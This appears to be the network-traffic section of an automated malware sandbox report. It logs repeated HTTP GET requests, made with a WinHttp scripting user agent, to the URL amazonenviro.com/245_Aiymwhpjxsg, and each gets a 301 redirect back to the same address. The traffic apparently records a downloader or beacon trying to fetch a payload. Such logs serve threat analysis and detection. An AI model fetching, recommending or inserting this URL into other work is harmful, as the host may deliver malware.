                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:42.569226980 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:42.879467964 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:42 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:44.521003008 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:45.715809107 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:44 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:45.716080904 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:44 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:45.716178894 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:44 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:47.317533970 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:47.627629042 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:47 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:49.255390882 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:49.572283983 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:49 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:51.216979027 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:51.527559996 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:51 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:53.148093939 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:53.458235025 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:53 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:55.102166891 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:55.412390947 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:55 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:57.076934099 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:57.387269974 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:57 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:59.019017935 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:59.329560995 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:59 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:00.949740887 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:01.260628939 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:01 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:02.953073978 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:03.281265974 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:03 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 61 7a 6f 6e 65 6e 76 69 72 6f 2e 63 6f 6d 2f 32 34 35 5f 41 69 79 6d 77 68 70 6a 78 73 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:04.962333918 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:05.274292946 CET500INHTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:05 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
